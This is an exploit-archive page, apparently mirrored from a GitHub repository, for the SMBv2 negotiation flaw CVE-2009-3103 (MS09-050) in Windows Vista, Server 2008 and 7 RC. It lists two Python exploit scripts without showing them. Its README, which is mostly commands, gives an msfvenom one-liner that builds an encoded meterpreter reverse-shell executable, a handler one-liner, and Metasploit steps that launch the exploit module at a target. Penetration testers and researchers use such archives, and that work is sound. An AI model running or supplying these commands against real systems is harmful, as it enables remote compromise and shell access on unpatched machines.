Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2009-3103 PoC — Microsoft Windows Vista和Windows 7畸形SMB报文远程拒绝服务漏洞

Source
https://github.com/sec13b/ms09-050_CVE-2009-3103
Associated Vulnerability
Title:Microsoft Windows Vista和Windows 7畸形SMB报文远程拒绝服务漏洞 (CVE-2009-3103)
Description:Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
Description
CVE-2009-3103 ms09-050
Readme
# ms09-050_CVE-2009-3103<br />
CVE-2009-3103 ms09-050<br />

<br />
# One liner to create/generate a payload for windows<br />
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/<br />
<br />

# One liner start meterpreter<br />
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.1.1;set LPORT 4444;run;"<br />
<br /><br />

msf > search MS09_050 <br />
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index  <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > options <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 192.168.1.1 <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > run 
<br />
File Snapshot

 [4.0K]  /data/pocs/27cbce6c5e8a2c90c2768157a6662c3ce883ae33
├── [4.7K]  MS09_050_2.py
├── [5.9K]  ms09-050.py
└── [ 939]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →